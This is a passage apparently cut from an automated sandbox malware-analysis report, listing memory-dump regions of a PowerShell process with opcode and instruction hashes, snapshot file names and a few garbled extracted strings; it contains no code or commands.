                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0d7f74b3a05595fc9d778e59024983ffd9b3ae1cf487087b5d9e03e33f293ef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF0A7317006249FD7109A5AD844A6FB7E9EB89275B10092DE149C3380DF71AC418BA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c02fd2c3e307f0d7cbf6dceb12197f1550b3ddac1763935dc3f670e08ca0aef4
                                                                                                                                                                                                                                      • Instruction ID: 8acb878ef5ce3b0e2c2bfa9fc7ed113232052409f29e9cabdd07574681383ce8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c02fd2c3e307f0d7cbf6dceb12197f1550b3ddac1763935dc3f670e08ca0aef4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BF01D75200640AFD765CF06CD85D23BBBAFBC5720B198499E84A5B316C631FC42CF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8bcd8375ca132f9a77802725e04edbbf16c71f4803196fd349987bc5e8b1f9a6
                                                                                                                                                                                                                                      • Instruction ID: 6f8d2c8cccad15d29c0420f373e765de968f22e4d414d65e4098795ed9d40185
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bcd8375ca132f9a77802725e04edbbf16c71f4803196fd349987bc5e8b1f9a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F0A039700115CFCB00EB6CD944A9A7BE2EBCC2557054199E809CB324DF34ED028BA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dd580667c2e2d95cfebca6dd40af42fd1596550de6cf109267f2dfee01835d30
                                                                                                                                                                                                                                      • Instruction ID: c1cf3a3797111d552e959a06fb80ebdc1f994909c3222fd213faaaf8b93e97e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd580667c2e2d95cfebca6dd40af42fd1596550de6cf109267f2dfee01835d30
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0E2317041045BE304BBA4D0143AB7796DFC132CF10812AC90A47785CE3D2842CBE2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8650552bda6e66039294b4dd52a0f79e2e97949a12ae3a3ee94a0ebce7dcb3cc
                                                                                                                                                                                                                                      • Instruction ID: 0f69f70a021326aad8c602fd8b4cc4d1287f7a94bacbc0af631559e0ce66cc4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8650552bda6e66039294b4dd52a0f79e2e97949a12ae3a3ee94a0ebce7dcb3cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE09A357001118F8700AF1DD488C26BBFAEFCE72232900AAF549DB374CA71EC028B90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 74bf77ae548d4edbe2b55035bb404f58a2d33d28996df031f66607e71e2b2057
                                                                                                                                                                                                                                      • Instruction ID: 3727f031807d8a25f816c0a5741d888bd5f0a943f1f6ea1fd80917925c160ba9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74bf77ae548d4edbe2b55035bb404f58a2d33d28996df031f66607e71e2b2057
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F05870A083404FD7649FB8D4A87EABFE1EB46314F0444AED59ED7342CB386882CB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fcf67671bbf91d22752e1953c702a148747cd1cdab961624784f7eca1f652edf
                                                                                                                                                                                                                                      • Instruction ID: d0504f1f9df8e2a1946b99fa6a1290d5d181b752a28510a79856c7b77b69367e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcf67671bbf91d22752e1953c702a148747cd1cdab961624784f7eca1f652edf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1E022303405A01BC3125B2D6D14AEF6BEADFC9220304416EE0A9D3302DE94D8078BA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d7942263bfabe72e4fa2701f4c53b4430288e928d689ac2062b8380f60fffae6
                                                                                                                                                                                                                                      • Instruction ID: ee5be041348d10fb43747054a5e08ca901107048ad07ea5dc36868b12ca4b1b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7942263bfabe72e4fa2701f4c53b4430288e928d689ac2062b8380f60fffae6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E026217461B21BDB5272BC1E207FA7EC58FC209CF0842BDC945C7242DD908C0383A2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a511dd144c89a53089a5ef6c29c4a46119e9f6495c9394e815364e4b37c7eb1
                                                                                                                                                                                                                                      • Instruction ID: 63c0f3a47cebd92c84788b8d3d837120eabf209401e6fb4229b3be4909cea4e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a511dd144c89a53089a5ef6c29c4a46119e9f6495c9394e815364e4b37c7eb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDE02B36B041D45BC7058768E4514ECBFB1DBC9220F0484BEC896A7321DA311557CB61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8182dc238614a24dcd23ec740b6289c53f5774bc6757e2c25e97a7300b06ea9b
                                                                                                                                                                                                                                      • Instruction ID: d9db108ef32909658344c6899b57e1338fbec2edb987413d76684f90bc366f50
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8182dc238614a24dcd23ec740b6289c53f5774bc6757e2c25e97a7300b06ea9b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F0E53570D2904BDB0977B8A9183ED3F61EBC1318F04016EE64687243CF681816CB99
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2fb6af86e302e863b672b06127247e2f4035c25824ef277576a15ea5e6b02687
                                                                                                                                                                                                                                      • Instruction ID: 556e86a5c920f0a90b042c79eb0772029fbe5c59f89be6c8a339229e35a44f55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fb6af86e302e863b672b06127247e2f4035c25824ef277576a15ea5e6b02687
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF06D70A043044BD364AFB9D49C79ABBE5EB45310F00442DE54ED3341DB3968818B90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 125df919e54959900a4645685a2e3bda1b297bc43ef1a6e0a4503eb34a420cba
                                                                                                                                                                                                                                      • Instruction ID: e75355819387ff5f1acdba68bd3b25968033f1384826c4a0ba9086f358f37e55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 125df919e54959900a4645685a2e3bda1b297bc43ef1a6e0a4503eb34a420cba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE0263130861047CB0C37B4A50C3AE7A56EBC4728F00002EE60A83342CF38281283EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d1e7b8bff12aa2ec55995b31a86b83c35a65c604dbdf201616ce35ef1bd2a1e8
                                                                                                                                                                                                                                      • Instruction ID: e2065be0ee3d33cc1b5e0edc896cadbc7f8311868589e86ded4986564a457d70
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1e7b8bff12aa2ec55995b31a86b83c35a65c604dbdf201616ce35ef1bd2a1e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50D05E52B41532275A5470BA1E10BBBB5CECFC54E9B054236DE09C3281ED90EC0343F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                      • Instruction ID: ecb78d484c1991a793b2e52aefbca61f350251c1733cc1985b4a484663d4aaa4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56E08632B00014978B489599D4504D9F7A5DBCC220F04847ED91AA7340DA3269168691
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2920131e50859acb6c5cdcf0ca882c733b30f3e475fb37d0719289ce044785d7
                                                                                                                                                                                                                                      • Instruction ID: a97a2334b2aee89e8831b034f7a4f30144646314fa2569e098634acda6ea372f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2920131e50859acb6c5cdcf0ca882c733b30f3e475fb37d0719289ce044785d7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE0C231740A241B82156A6EA91085FB7DADFC4671350442EE029C7340DE64EC0687E5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1e69ffdfc8b7889deb3f091be3d363a0913f9161009726fad634854f2b38e6a1
                                                                                                                                                                                                                                      • Instruction ID: 2559728c78bce87a44c4bbf7f63a9780bab56f584df9c1b3f99be83c8dd8bbb4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e69ffdfc8b7889deb3f091be3d363a0913f9161009726fad634854f2b38e6a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3E0C22AB5C2E10E9B1A927E38206AA6FA38BCA51471981B9E088CB301CC518C074390
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ee409dead964516343f64642c9131545f6eec0ab8a10464e5cfbee3baf3b3d40
                                                                                                                                                                                                                                      • Instruction ID: 42d35c3bec2054dcf0c1073a8d80acb24655e039140506fcf70efbb9fb6118cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee409dead964516343f64642c9131545f6eec0ab8a10464e5cfbee3baf3b3d40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE04F74D0020AAF8780EFBCD8415AAFFF4AB08210F5084AAD91DE7301E6319643DFD1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6bfe3da86ffb3c99a69c2cb68556f59d10d6afbe6d1e44c1802e7c83c9bf4e12
                                                                                                                                                                                                                                      • Instruction ID: 440281baa34dbcab24a52583151ea4ae338ee24f96127cac32e9a86c932884df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bfe3da86ffb3c99a69c2cb68556f59d10d6afbe6d1e44c1802e7c83c9bf4e12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E04F3581D0C98BDB0EBBB8E91A9FD7F70EA05311B40029DD9A753193DA30065BCF91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f65213329480aaed5d13a31da36fa863d9756da1bd51e440947ab057017bee26
                                                                                                                                                                                                                                      • Instruction ID: bd066058eb6c8a79e9b8786e531c78f219be26842869f88d8d05d48413154b5c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f65213329480aaed5d13a31da36fa863d9756da1bd51e440947ab057017bee26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31E04F31F18186CFC708EBA4D6565AABFB0DB45300B0041ADD99597712E6315851EF81
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                      • Instruction ID: 8174f683c838226a02493bf0c56eac2cad91e8bc5c0c97b5cfe9562db179a409
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD067B1D042199F8780EFADC94156EFBF4EB48200F6085AA8919E7301F7729A12DBD1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ffe9c23f1c375caa6683201847e41ca7de311b8bb73770204030276df67fab4c
                                                                                                                                                                                                                                      • Instruction ID: d198ab0644345e9332a90afd265329acb550c4511ec691fcd0ede7f0e4f12691
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffe9c23f1c375caa6683201847e41ca7de311b8bb73770204030276df67fab4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21D067319091098BCB0CBBA5E95A5FDBB74FB14301F40416DD92792192EA312A5ACAC5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5c01cc7c4f097846c9073e4a781c24ab072a46774017971315eb6fd35dee0a2a
                                                                                                                                                                                                                                      • Instruction ID: 07e98ab7526547ff94f35cea133345d596a2b981add2bccf641ec6e444b6aef3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c01cc7c4f097846c9073e4a781c24ab072a46774017971315eb6fd35dee0a2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D01734A0820A8B8B08EFA4E64696EBFB4EB44304F004169E94993341EA316801CBC1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 93ea5dd68dc2a7d7c02bbdac37791b4d951a9d2eee4edfb74df24cab71772af4
                                                                                                                                                                                                                                      • Instruction ID: 03aa1bab8f0cbcf74c23381c39d0e7688592c0fe1fb3e87e73b4ff37c95367b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93ea5dd68dc2a7d7c02bbdac37791b4d951a9d2eee4edfb74df24cab71772af4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC04C350853459BCB15AB75D0888597B21AB4221531009DCD80B5A652CE73C48ACE01
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: cc338e54d9a5bcf915229741addfcd117fe85c807fd87ea1b0adc5b291ea19c5
                                                                                                                                                                                                                                      • Instruction ID: 3b3a0027e2f6dbef3a3677958092b2f7c0e5a53d74397111a3069e57901de526
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc338e54d9a5bcf915229741addfcd117fe85c807fd87ea1b0adc5b291ea19c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAB092310447098FC2496F76E4089157329BB4221A3900CA8E90E0A2928E37E889CE45
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a217776f487a5e9008e866d9f0a2a9407100fcdd3a595268af517d2c4c981cfc
                                                                                                                                                                                                                                      • Instruction ID: 500b3924b55f5df76cae591303f2fdf3f810077e5849edfb424dab414a166519
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a217776f487a5e9008e866d9f0a2a9407100fcdd3a595268af517d2c4c981cfc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27A00235E101205BBE54D63749AB52676F2A6C331AB0488D0AD02D44759E38CCE3D943
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$84#l$84#l$pij$tP^q$tP^q$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                                                                                                                                                                                                      • API String ID: 0-3214008445
                                                                                                                                                                                                                                      • Opcode ID: 2797a6ee2c8fa2de5db0db0841aecbdeea710b58449a21037274612d71a83a89
                                                                                                                                                                                                                                      • Instruction ID: a7e1e7053d5281fd41479060792f32b5f3853ed518d0fd47a4780df8851cb0c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2797a6ee2c8fa2de5db0db0841aecbdeea710b58449a21037274612d71a83a89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D148B2B0420ACFC7248B68981466AFBF6AFC5310F19C47BDA45CF255DB32D885C7A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                      • API String ID: 0-3865595929
                                                                                                                                                                                                                                      • Opcode ID: 9d652378cdfe95579b7871859879d10c82da0f66c7192100953a667ad2767641
                                                                                                                                                                                                                                      • Instruction ID: 24ba100a481d5a132ff6f5013b576cd0112e948880530932f2600803171becb6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d652378cdfe95579b7871859879d10c82da0f66c7192100953a667ad2767641
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EA157B27043499FC7259B79D810766FFE5AFC6610F2B806AD649CF391CA31C885C7A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: fcq$4'^q$4'^q$4'^q$4'^q$r%l$r%l
                                                                                                                                                                                                                                      • API String ID: 0-3315550529
                                                                                                                                                                                                                                      • Opcode ID: b7c585e1e95265ff63930e2ef457092e31763c5901fa9a9c428fe592804b2ace
